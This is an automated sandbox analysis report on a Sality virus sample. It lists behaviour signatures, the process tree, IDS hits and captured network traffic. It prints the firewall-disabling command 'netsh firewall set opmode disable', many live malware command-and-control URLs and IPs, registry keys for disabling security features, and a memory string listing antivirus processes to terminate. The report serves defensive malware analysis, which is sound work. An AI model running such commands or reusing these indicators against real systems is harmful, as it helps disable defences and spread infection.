Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002B_38.exe

Overview

General Information

Sample name:LisectAVT_2403002B_38.exe
Analysis ID:1481739
MD5:dcd409fa904f30ab580781337fb866b7
SHA1:e377b6810bb20b46ec0ce24020a58dfec7f94b18
SHA256:2cca553e01de4f4ba2f5eaa1b0b1bc8bfbaee289d7b95dbdb3d6e0d67cd9c7fd
Tags:exeSality
Infos:

Detection

Sality
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject threads in other processes
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disable Task Manager(disabletaskmgr)
Disables UAC (registry)
Disables the Windows registry editor (regedit)
Disables the Windows task manager (taskmgr)
Disables the windows firewall (over ALG)
Disables user account control notifications
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
PE file has a writeable .text section
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Connects to several IPs in different countries
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries device information via Setup API
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • LisectAVT_2403002B_38.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_38.exe" MD5: DCD409FA904F30AB580781337FB866B7)
    • netsh.exe (PID: 3184 cmdline: netsh firewall set opmode disable MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • fontdrvhost.exe (PID: 776 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • fontdrvhost.exe (PID: 784 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SalityF-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.InfectionSality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult.Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.PayloadOnce installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
  • Salty Spider
https://malpedia.caad.fkie.fraunhofer.de/details/win.sality

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_SalityYara detected SalityJoe Security
    Process Memory Space: LisectAVT_2403002B_38.exe PID: 7092JoeSecurity_SalityYara detected SalityJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.LisectAVT_2403002B_38.exe.22f0000.5.unpackJoeSecurity_SalityYara detected SalityJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Modification of IE Registry Settings
        Source: Registry Key setAuthor: frack113: Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe, ProcessId: 7092, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline

        Snort Signatures

        No Snort rule has matched

        Suricata Signatures

        Timestamp:2024-07-25T13:45:08.202500+0200
        SID:2018340
        Source Port:49710
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-07-25T13:45:06.951501+0200
        SID:2018340
        Source Port:49709
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-07-25T13:45:22.156809+0200
        SID:2022930
        Source Port:443
        Destination Port:49715
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-25T13:46:00.464743+0200
        SID:2022930
        Source Port:443
        Destination Port:49722
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: LisectAVT_2403002B_38.exeAvira: detected
        Antivirus detection for URL or domain
        Source: http://kukutrustnet987.info/home.gifAvira URL Cloud: Label: malware
        Source: http://steamboy.h17.ru/mainf.gif?76caf3=7785203LAvira URL Cloud: Label: malware
        Source: http://steamboy.h17.ru/mainf.gifAvira URL Cloud: Label: malware
        Source: http://www.ukikt.org/mainf.gifAvira URL Cloud: Label: malware
        Source: http://www.klkjwre9fqwieluoi.info/Avira URL Cloud: Label: malware
        Source: http://klkjwre77638dfqwieuoi888.info/Avira URL Cloud: Label: malware
        Source: http://kukutrustnet888.info/home.gifAvira URL Cloud: Label: malware
        Source: http://macedonia.my1.ru/mainh.gif?7231d3=37419295sAvira URL Cloud: Label: malware
        Source: http://lpbmx.ru/logos.gif?722bd8=7482328Avira URL Cloud: Label: malware
        Source: http://macedonia.my1.ru/mainh.gif?7231d3=374192954Avira URL Cloud: Label: malware
        Source: http://macedonia.my1.ru/mainh.gifAvira URL Cloud: Label: malware
        Source: http://kukutrustnet777888.info/DisableTaskMgrSoftwareAvira URL Cloud: Label: phishing
        Source: http://kukutrustnet777.info/home.gifAvira URL Cloud: Label: malware
        Source: http://ramoo.w8w.pl/mainh.gifAvira URL Cloud: Label: malware
        Source: http://www.klkjwre9fqwieluoi.info/abp470n5.sysGetSystemDirectoryAdriversAvira URL Cloud: Label: malware
        Source: http://lpbmx.ru/logos.gifAvira URL Cloud: Label: malware
        Source: http://steamboy.h17.ru/mainf.gif?76caf3=7785203Avira URL Cloud: Label: malware
        Source: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gifAvira URL Cloud: Label: malware
        Source: http://jrsx.jre.net.cn/logos.gifAvira URL Cloud: Label: malware
        Source: http://jrsx.jre.net.cn/logos.gif?723619=74849530CEAvira URL Cloud: Label: malware
        Source: http://lpbmx.ru/logos.gif?722bd8=74823287h)Avira URL Cloud: Label: malware
        Source: http://steamboy.h17.ru/mainf.gif?76caf3=7785203jAvira URL Cloud: Label: malware
        Source: http://kukutrustnet777888.info/Avira URL Cloud: Label: phishing
        Source: http://lpbmx.ru/logos.gifhttp://macedonia.my1.ru/mainh.gifhttp://jrsx.jre.net.cn/logos.gifhttp://steAvira URL Cloud: Label: malware
        Source: http://89.119.67.154/testo5/Avira URL Cloud: Label: malware
        Source: http://macedonia.my1.ru/mainh.gif?7231d3=37419295Avira URL Cloud: Label: malware
        Source: http://steamboy.h17.ru/UAvira URL Cloud: Label: malware
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for sample
        Source: LisectAVT_2403002B_38.exeJoe Sandbox ML: detected
        Source: LisectAVT_2403002B_38.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 195.201.126.132:443 -> 192.168.2.8:49712 version: TLS 1.2
        Source: Binary string: notepad.pdbGCTL source: ipyr.exe.0.dr
        Source: Binary string: notepad.pdb source: ipyr.exe.0.dr

        Spreading

        barindex
        Yara detected Sality
        Source: Yara matchFile source: 0.2.LisectAVT_2403002B_38.exe.22f0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002B_38.exe PID: 7092, type: MEMORYSTR
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: [AutoRun]
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: autorun.inf
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 0_kkiuynbvnbrev406C:\l8geqpHJTkdns0MCIDRV_VEROpera/8.89 (Windows NT 6.0; U; en)MPRNtQuerySystemInformationGlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/abp470n5.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_90830SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List%s:*:Enabled:ipsecNOTEPAD.EXENOTEPAD.EXEWINMINE.EXENOTEPAD.EXENOTEPAD.EXESOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMBhttp://\Runhttphttp://klkjwre77638dfqwieuoi888.info/www.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\abp470n5.EXE.SCRSfcIsFileProtectedsfcWINDOWSdrw.VDB.AVCNTDLL.DLLrnd=autorun.infWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERCreateThreadwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV Engineavast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardavp1BackWeb Plug-in - 4476822bdssBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagernavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwtmproxytcpsrUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallXCOMMAVPSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exe_AVPM.A2GUARD.AAVSHIELD.AVASTADVCHK.AHNSD.AIRDEFENSEALERTSVCALOGSERVALSVC.AMON.ANTI-TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ATCON.ATUPDATER.ATWATCH.AVCIMAN.AVCONSOL.AVENGINE.AVESVC.AVGAMSVR.AVGCC.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVGNTDDAVGNTMGRAVGSERV.AVGUARD.AVGUPSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVPM.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITOR9X.AVXMONITORNT.AVXQUAR.BDMCON.BDNEWS.BDSUBMIT.BDSWITCH.BLACKD.BLACKICE.CAFIX.CCAPP.CCEVTMGR.CCPROXY.CCSETMGR.CFIAUDIT.CLAMTRAY.CLAMWIN.CLAW95.CUREITDEFWATCH.DRVIRUS.DRWADINS.DRWEB32W.DRWEBSCD.DRWEBUPW.DWEBLLIODWEBIOESCANH95.ESCANHNT.EWIDOCTRL
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_004099CB DialogBoxParamA,_memset,_memset,_memset,GetSystemDirectoryA,_swprintf,FindFirstFileA,FindFirstFileA,_strcpy_s,SHGetFolderPathA,_swprintf,FindFirstFileA,_strcpy_s,0_2_004099CB
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00401A50 FindFirstFileA,SetLastError,GetLastError,GetLastError,FindNextFileA,GetLastError,FindClose,0_2_00401A50
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00409700 GetWindowsDirectoryA,_sprintf,_sprintf,FindFirstFileA,_printf,_sprintf,FindClose,FindNextFileA,FindNextFileA,_sprintf,FindNextFileA,FindClose,FindClose,0_2_00409700
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022FFA87 Sleep,FindFirstFileA,FindNextFileA,FindClose,Sleep,0_2_022FFA87
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022FB81A FindFirstFileA,FindNextFileA,Sleep,0_2_022FB81A
        Source: unknownNetwork traffic detected: IP country count 10
        Source: global trafficUDP traffic: 192.168.2.8:50152 -> 94.76.218.18:1743
        Source: global trafficUDP traffic: 192.168.2.8:50153 -> 94.76.206.216:1743
        Source: global trafficUDP traffic: 192.168.2.8:50154 -> 189.68.58.176:8040
        Source: global trafficUDP traffic: 192.168.2.8:50155 -> 81.190.94.112:6724
        Source: global trafficUDP traffic: 192.168.2.8:50156 -> 77.122.85.173:4956
        Source: global trafficUDP traffic: 192.168.2.8:50157 -> 201.45.100.171:6820
        Source: global trafficUDP traffic: 192.168.2.8:50158 -> 217.70.126.141:5630
        Source: global trafficUDP traffic: 192.168.2.8:55414 -> 81.10.9.50:5569
        Source: global trafficUDP traffic: 192.168.2.8:55415 -> 94.50.7.74:4580
        Source: global trafficUDP traffic: 192.168.2.8:54732 -> 77.39.42.64:7886
        Source: global trafficUDP traffic: 192.168.2.8:61919 -> 80.69.51.98:7886
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 94.76.218.18
        Source: unknownUDP traffic detected without corresponding DNS query: 94.76.206.216
        Source: unknownUDP traffic detected without corresponding DNS query: 189.68.58.176
        Source: unknownUDP traffic detected without corresponding DNS query: 81.190.94.112
        Source: unknownUDP traffic detected without corresponding DNS query: 77.122.85.173
        Source: unknownUDP traffic detected without corresponding DNS query: 201.45.100.171
        Source: unknownUDP traffic detected without corresponding DNS query: 217.70.126.141
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 94.50.7.74
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 77.39.42.64
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 80.69.51.98
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022FF805 InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,FindCloseChangeNotification,InternetCloseHandle,InternetCloseHandle,0_2_022FF805
        Source: global trafficHTTP traffic detected: GET /mainh.gif?7231d3=37419295 HTTP/1.1User-Agent: Opera/8.89 (Windows NT 6.0; U; en)Host: macedonia.my1.ruCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /mainf.gif?76caf3=7785203 HTTP/1.1User-Agent: Opera/8.89 (Windows NT 6.0; U; en)Host: steamboy.h17.ruCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: lpbmx.ru
        Source: global trafficDNS traffic detected: DNS query: macedonia.my1.ru
        Source: global trafficDNS traffic detected: DNS query: jrsx.jre.net.cn
        Source: global trafficDNS traffic detected: DNS query: steamboy.h17.ru
        Source: global trafficDNS traffic detected: DNS query: www.otzywy.com
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.8.0Date: Thu, 25 Jul 2024 11:45:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Data Raw: 31 63 36 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 54 54 50 20 34 30 34 20 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 20 66 6f 6e 74 3a 20 31 32 70 78 2f 32 32 70 78 20 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 36 38 36 38 36 38 3b 7d 0a 62 6f 64 79 20 61 20 7b 63 6f 6c 6f 72 3a 20 23 33 32 61 32 63 66 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 7d 0a 62 6f 64 79 20 61 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0a 74 64 2c 20 69 6e 70 75 74 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 66 6f 6e 74 3a 20 31 32 70 78 20 2f 32 32 70 78 20 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 36 38 36 38 36 38 3b 7d 0a 2e 63 6c 65 61 72 20 7b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 20 7b 77 69 64 74 68 3a 20 37 33 35 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 7d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 68 65 61 64 65 72 2d 2d 2d 2d 2d 2d 2a 2f 0a 23 68 65 61 64 65 72 20 7b 68 65 69 67 68 74 3a 20 35 35 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 2f 2e 73 2f 69 6d 67 2f 65 72 72 2f 34 30 34 2d 68 65 61 64 65 72 2d 6c 69 6e 65 2e 67 69 66 29 20 72 65 70 65 61 74 2d 78 20 30 20 34 30 70 78 3b 7d 0a 23 6c 6f 67 6f 20 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 32 36 70 78 20 30 20 30 20 30 3b 20 77 69 64 74 68 3a 20 34 33 70 78 3b 20 68 65 69 67 68 74 3a 20 32 37 70 78 3b 7d 0a 23 6c 6f 67 6f 20 61 20 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 70 61 64 64 69 6e 67 3a 20 30 20 39 70 78 3b 20 77 69 64 74 68 3a 20 34 33 70 78 3b 20 68 65 69 67 68 74 3a 20 32 37 70 78 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 20 2d 39 39 39 39 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 20 75 72 6c 28 2f 2e 73 2f 69 6d 67 2f 65 72 72 2f 34 30 34 2d 6c 6f 67 6f 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 7d 0a 2e 73 69 74 65 2d 63 72 65 61 74 65 20 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 6d 61 72 67 69 6e 3a 20 32 36 70 78 20 30
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
        Source: LisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://jrsx.jre.net.cn/logos.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jrsx.jre.net.cn/logos.gif?723619=74849530
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jrsx.jre.net.cn/logos.gif?723619=74849530CE
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://klkjwre77638dfqwieuoi888.info/
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777.info/home.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet888.info/home.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet987.info/home.gif
        Source: LisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lpbmx.ru/logos.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.000000000051E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lpbmx.ru/logos.gif?722bd8=7482328
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lpbmx.ru/logos.gif?722bd8=74823287h)
        Source: LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lpbmx.ru/logos.gifhttp://macedonia.my1.ru/mainh.gifhttp://jrsx.jre.net.cn/logos.gifhttp://ste
